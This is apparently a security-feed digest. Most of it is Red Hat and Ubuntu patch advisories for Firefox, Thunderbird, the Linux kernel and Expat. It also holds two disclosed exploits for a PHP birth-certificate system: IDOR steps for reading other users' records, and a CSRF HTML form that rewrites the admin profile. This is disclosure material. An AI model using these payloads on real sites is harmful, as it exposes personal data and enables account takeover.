Red Hat Security Advisory 2022-6703-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6703-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6703  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-102.3.0-6.el8_1.src.rpm

ppc64le:  
firefox-102.3.0-6.el8_1.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el8_1.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el8_1.ppc64le.rpm

x86_64:  
firefox-102.3.0-6.el8_1.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el8_1.x86_64.rpm  
firefox-debugsource-102.3.0-6.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0YtzjgjWX9erEAQiFCg/6A22FZMDDiBFcw5xxNzawSZ7L4bdBC/QX  
CnYtzed0BFF4irQctN2nkvYJV3E6mWYKUnO1brqyixlnZtk8mjo97CgNoijEM6JP  
mA2qNRleC6KNU4mmz0GWwkJqz/iIWQ78X6CV7AnZSOQQrMh0cT743jO/+/bf/QW8  
NGSlLtYDdAkv6u/Nwdzp3VnzCO8IJFz2kQ7txIATnyw2eEUAlEXfkkPPGCCtIVuL  
23eVFQndO1rB1qblx3jsO/43xtyBoiMsf5UKJGitRLhWOV6/Z4w2Hk+L7i55N7sy  
FRFyvmJ76TefD5ymIoKDi3EN7tIEdOs1ousR6rbNljH1DF/czQliMRm/u2WdKUkL  
UfBEDT924UABK5wPOg6uaponT9GlOTW1jXaQsyDi+nLmxHV6I1l8kuY+d63VHeOs  
N0kcV00oq4FRPURc99wJAjo0uosY0Wm6elQJBTT0F20UMoaPtXDWFka+bp35lT02  
ufWuxsN8550DL/6lx6TePGQ0Z84NKY4FUnmy59Xbct7lCUyBewnZwme0VMK57a4+  
8WfDgLdk/rc0eLPjvwuEIoh6wqfocEh63Wy62imzo1QeDm25NAnH7VXzpXH2PMwF  
BSyUNzdVl2icVGFbXi9u7eU1b30sm7MsA7PvqzJiwpmA9eu8bky23zDGO3TKIEup  
CDxPUlXH9ys=  
=G7Tz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6703-01

Red Hat Security Advisory 2022-6707-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6707-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6707  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
firefox-102.3.0-6.el8_2.src.rpm

aarch64:  
firefox-102.3.0-6.el8_2.aarch64.rpm  
firefox-debuginfo-102.3.0-6.el8_2.aarch64.rpm  
firefox-debugsource-102.3.0-6.el8_2.aarch64.rpm

ppc64le:  
firefox-102.3.0-6.el8_2.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el8_2.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el8_2.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el8_2.s390x.rpm  
firefox-debuginfo-102.3.0-6.el8_2.s390x.rpm  
firefox-debugsource-102.3.0-6.el8_2.s390x.rpm

x86_64:  
firefox-102.3.0-6.el8_2.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el8_2.x86_64.rpm  
firefox-debugsource-102.3.0-6.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0VtzjgjWX9erEAQgniQ/8CCA4KMNvro67ndbv00AxPxKJIbzFRIP5  
B2GFFWQJFZisvpgnU2Nmb8t382AqZdqJZuGJDVBAEkPZ/KQHMD9KiE0Ucb2gxAk0  
YT/4TSk9o5aY3S577yblz7YbvUXKXclaa+pECwui77GLr+G9HO7q/CT1PKDQlSSM  
CVjjvdASJSbnjZwuLHzzvsItSyGFHB605e6eKq92QDP90bFxAhNrXVGjJU0zLhE/  
c8eIpp0NVOnz2nCUf/SrsqiADYMQyyBHdwVB+7PsmJ2NsB2gj8cqI2rOJ5r10mr3  
bC5SMK1LbX4ha7iw99WU/5Z5VFnxq4dPJK4wAhBwUscb1iHUBU6UDTclTJxPgarY  
YcRs+GTgppP8dbq8/5SuU78we3OeDiJW+7CZeuA5B9DgR6hOkSL9xtusYAhQmnE1  
OOlgxe31RVaBON/5TjQqrSKn8wq4ijbOaLKCQszfLG4rz+bGjBsR7vfCWzt3QZ6Q  
1C8/BJpRpl5cujcWxvc/FT0x3J2nKUuL8g3OM5zvJdskibsZIyHCoi4yU0+KrKJZ  
ZAw3FRPXahXkTG97Ua9Xd4CwRHSrmNxxjA8Za1FV/daRTPkcFG4e0+EdOaAynT7V  
Wcm4ypDVL60VCnqupiuIkRImLumECzysaPQfA1E1MyXdq2aFMHtRWCC8NQA2QT0k  
SoINctHlA4U=  
=/8E1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6707-01

Red Hat Security Advisory 2022-6708-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6708-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6708  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-3032 CVE-2022-3033 CVE-2022-3034   
                   CVE-2022-36059 CVE-2022-40956 CVE-2022-40957   
                   CVE-2022-40958 CVE-2022-40959 CVE-2022-40960   
                   CVE-2022-40962   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* Mozilla: Leaking of sensitive information when composing a response to an  
HTML email with a META refresh tag (CVE-2022-3033)

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Remote content specified in an HTML document that was nested  
inside an iframe's srcdoc attribute was not blocked (CVE-2022-3032)

* Mozilla: An iframe element in an HTML email could trigger a network  
request (CVE-2022-3034)

* Mozilla: Matrix SDK bundled with Thunderbird vulnerable to  
denial-of-service attack (CVE-2022-36059)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2123255 - CVE-2022-3032 Mozilla: Remote content specified in an HTML document that was nested inside an iframe's srcdoc attribute was not blocked  
2123256 - CVE-2022-3033 Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag  
2123257 - CVE-2022-3034 Mozilla: An iframe element in an HTML email could trigger a network request  
2123258 - CVE-2022-36059 Mozilla: Matrix SDK bundled with Thunderbird vulnerable to denial-of-service attack  
2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-102.3.0-3.el8_6.src.rpm

aarch64:  
thunderbird-102.3.0-3.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.aarch64.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.3.0-3.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.3.0-3.el8_6.s390x.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.s390x.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.s390x.rpm

x86_64:  
thunderbird-102.3.0-3.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.x86_64.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3032  
https://access.redhat.com/security/cve/CVE-2022-3033  
https://access.redhat.com/security/cve/CVE-2022-3034  
https://access.redhat.com/security/cve/CVE-2022-36059  
https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0TNzjgjWX9erEAQiB3RAAkahXHjRspQ+guIITh2rYcmBoQL3GvQZd  
XEI1V8Dk6rnjdt/+6FgYgfggr+73qIj/1/qGYoJofdAPLRUd1pvUTRixC+emHE+W  
iVgo/URHjOBqkMRmc4wUjLkb0xn/voirDTooLAx7opbhzT5FPRAEitGYUbWsI7l2  
9r2f7CJS4sYu/PA3bEm0I+EJDNAHZuL9+9mmbRQNNHT/vwT9R66jdqoZY8wbpvL6  
T899ruuHWEuorCvhsdBsL2BHPxYDQFASlKvkXppPQFjNy09GvmfgbSci//Foy3Uf  
1Sl22PV6QxI+haIg/SWhzrFUQRQpfRtrn5v8Y47yRiqXsat0Zpgn7xcLey/fW4Kj  
rchBJXtvm4lQZwow7Dim/6YdLXsXl0btf9VuV5275qOm5ywYYzUg/f5bDSDLY7Cu  
lfsFo1AybY9TYnzGhL7bTrKZuW/jMHa8T2ftD3LhTudG+VOO2zBepXR1/bH7SYUE  
jndbovr8vpws34oQsSUeTKsd/u9jUJ683IG3G875BmtcxfnA7fBDy8yZ3SB1l+2Q  
8AobvEi/5c+zcXoUirub3X+fxEA/VKjwHUNEYLif3p8DVBNiCTQot1KHHbTxGgKf  
1vMEOdptvYDiZm8l0AZOag/Ew1Fc2PZIhI8JBoDWPc/JNqxSz6V0pzNi0iEGLJL+  
rbfDeg3UhFQ=  
=Gluw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6708-01

Online Birth Certificate Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Insecure Direct Object Reference (IDOR)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Manage Details and click any Birth number.3)In /OBCMS/user/view-application-detail.php?viewid=1, modify the id Parameter to View birthreg details,First Name, Phone number, and other data

Online Birth Certificate Management System 1.0 Insecure Direct Object Reference

Ubuntu Security Notice 5639-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-5639-1September 26, 2022linux-azure-fde vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systemsDetails:It was discovered that the framebuffer driver on the Linux kernel did notverify size limits when changing font or screen size, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2021-33655)Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementationin the Linux kernel did not provide sufficient randomization whencalculating port offsets. An attacker could possibly use this to exposesensitive information. (CVE-2022-1012, CVE-2022-32296)Norbert Slusarek discovered that a race condition existed in the perfsubsystem in the Linux kernel, resulting in a use-after-free vulnerability.A privileged local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2022-1729)It was discovered that the device-mapper verity (dm-verity) driver in theLinux kernel did not properly verify targets being loaded into the device-mapper table. A privileged attacker could use this to cause a denial ofservice (system crash) or possibly execute arbitrary code. (CVE-2022-2503)Domingo Dirutigliano and Nicola Guerrera discovered that the netfiltersubsystem in the Linux kernel did not properly handle rules that truncatedpackets below the packet header size. When such rules are in place, aremote attacker could possibly use this to cause a denial of service(system crash). (CVE-2022-36946)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1091-azure-fde  5.4.0-1091.96+cvm1.1   linux-image-azure-fde           5.4.0.1091.96+cvm1.31After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5639-1   CVE-2021-33655, CVE-2022-1012, CVE-2022-1729, CVE-2022-2503,   CVE-2022-32296, CVE-2022-36946Package Information:   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.4.0-1091.96+cvm1.1

Ubuntu Security Notice USN-5639-1

Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# no token in update profile admin<html>    <head>        <title> CSRF update Profile </title>    </head>    <body>        <form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">            <input type="hidden" name="adminname" value="csrf111">            <input type="hidden" name="username" value="csrf">            <input type="hidden" name="email" value="csrf">            <input type="hidden" name="mobilenumber" value="0">            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>        </form>    </body></html>

Online Birth Certificate Management System 1.0 Cross Site Request Forgery

Ubuntu Security Notice 5638-1 - Rhodri James discovered that Expat incorrectly handled memory when processing certain malformed XML files. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5638-1September 26, 2022expat vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Expat could be made to crash or execute arbitrary code.Software Description:- expat: XML parsing C libraryDetails:Rhodri James discovered that Expat incorrectly handled memory whenprocessing certain malformed XML files. An attacker could possiblyuse this issue to cause a crash or execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   expat                               2.1.0-7ubuntu0.16.04.5+esm6   lib64expat1                     2.1.0-7ubuntu0.16.04.5+esm6   libexpat1                         2.1.0-7ubuntu0.16.04.5+esm6In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5638-1   CVE-2022-40674

Ubuntu Security Notice USN-5638-1

Red Hat Security Advisory 2022-6710-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6710-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6710  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-3032 CVE-2022-3033 CVE-2022-3034   
                   CVE-2022-36059 CVE-2022-40956 CVE-2022-40957   
                   CVE-2022-40958 CVE-2022-40959 CVE-2022-40960   
                   CVE-2022-40962   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* Mozilla: Leaking of sensitive information when composing a response to an  
HTML email with a META refresh tag (CVE-2022-3033)

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Remote content specified in an HTML document that was nested  
inside an iframe's srcdoc attribute was not blocked (CVE-2022-3032)

* Mozilla: An iframe element in an HTML email could trigger a network  
request (CVE-2022-3034)

* Mozilla: Matrix SDK bundled with Thunderbird vulnerable to  
denial-of-service attack (CVE-2022-36059)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2123255 - CVE-2022-3032 Mozilla: Remote content specified in an HTML document that was nested inside an iframe's srcdoc attribute was not blocked  
2123256 - CVE-2022-3033 Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag  
2123257 - CVE-2022-3034 Mozilla: An iframe element in an HTML email could trigger a network request  
2123258 - CVE-2022-36059 Mozilla: Matrix SDK bundled with Thunderbird vulnerable to denial-of-service attack  
2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-102.3.0-3.el7_9.src.rpm

x86_64:  
thunderbird-102.3.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-102.3.0-3.el7_9.src.rpm

ppc64le:  
thunderbird-102.3.0-3.el7_9.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.ppc64le.rpm

x86_64:  
thunderbird-102.3.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-102.3.0-3.el7_9.src.rpm

x86_64:  
thunderbird-102.3.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3032  
https://access.redhat.com/security/cve/CVE-2022-3033  
https://access.redhat.com/security/cve/CVE-2022-3034  
https://access.redhat.com/security/cve/CVE-2022-36059  
https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0QtzjgjWX9erEAQjJ/g/8DhFo8FzyNIYAclnV2nX0os649M45iqF+  
kHbnTz7+YvxlY4U7GI7CL/Fxa8spHH3gOjKEsj602MnZ/R3jC422YuLTcIhlQx+o  
B4q1Knfr3ZPLY9rsSB4u6TbtjEC0paNNBfzKahLcZ1OorBXiARf7FaAfBBTCgtM0  
XWivpKkESba4svLKhSioFN3aX75ws8vj0K3eeraPE9+/IBrqgCj4Tj9Te0oL1tGO  
6rDx0t35EeXFCwUurvO5upx3eMzQFTzIqAGQFgdKj6Yfhe6nIE0TSC+eJw237+Ai  
wOZpenjQfWijve/bGuNk/+XB6/KtYcdaMU7NO6VwfxvawmqwbTkkXU3PpU5jxl47  
5f88goZJqB0FPrnU6kB6mqNo2pMHdUs00WcIp0XCrC0XEMYQ+BCH2mAnNfWhcl1O  
mJNdaeYBeWhfE8j6n8khImBOarQISomVwfBk0a/r0gdZlrTEVH68kLC4UkpL9//n  
aH4DqXSeseg4jBTt8+YAVp2iLRJRAHSWtXZW4G4Erhnd2XI80rNd+C69Aznv/UcJ  
